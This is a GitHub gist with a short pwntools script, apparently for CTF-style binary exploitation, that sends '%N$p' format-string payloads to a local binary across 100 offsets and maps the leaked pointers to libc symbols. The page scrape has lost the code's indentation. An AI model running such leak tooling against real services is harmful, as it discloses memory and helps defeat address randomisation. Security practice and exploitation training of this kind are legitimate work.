Skip to content

Instantly share code, notes, and snippets.

@clubby789
Created September 4, 2020 23:03
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save clubby789/803cd5efd5a1916857554ccf79c7e3e7 to your computer and use it in GitHub Desktop.
Save clubby789/803cd5efd5a1916857554ccf79c7e3e7 to your computer and use it in GitHub Desktop.
Pwntools-based format string fuzzer
from pwn import *
context.arch = "amd64" # Change as applicable
e = ELF("./format") # Binary name
p = process(e.path)
l = p.libc # Load libc, initialised with correct values
rev = {value : key for (key, value) in l.sym.items()}
# Flip sym:addr dict
def exec_fmt(pl):
p.sendline(pl)
return p.clean()
# Assumes process loops forever; you'll need to spawn a new process
# in this loop if you only get a few leaks
for x in range(0, 100):
# Leak pointer at offset
l = exec_fmt(f'%{x}$p').strip()
try:
l = int(l, 16)
print(f"%{x}$p : {hex(l)} - {rev[l]}")
# Print matching symbol if found
except:
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment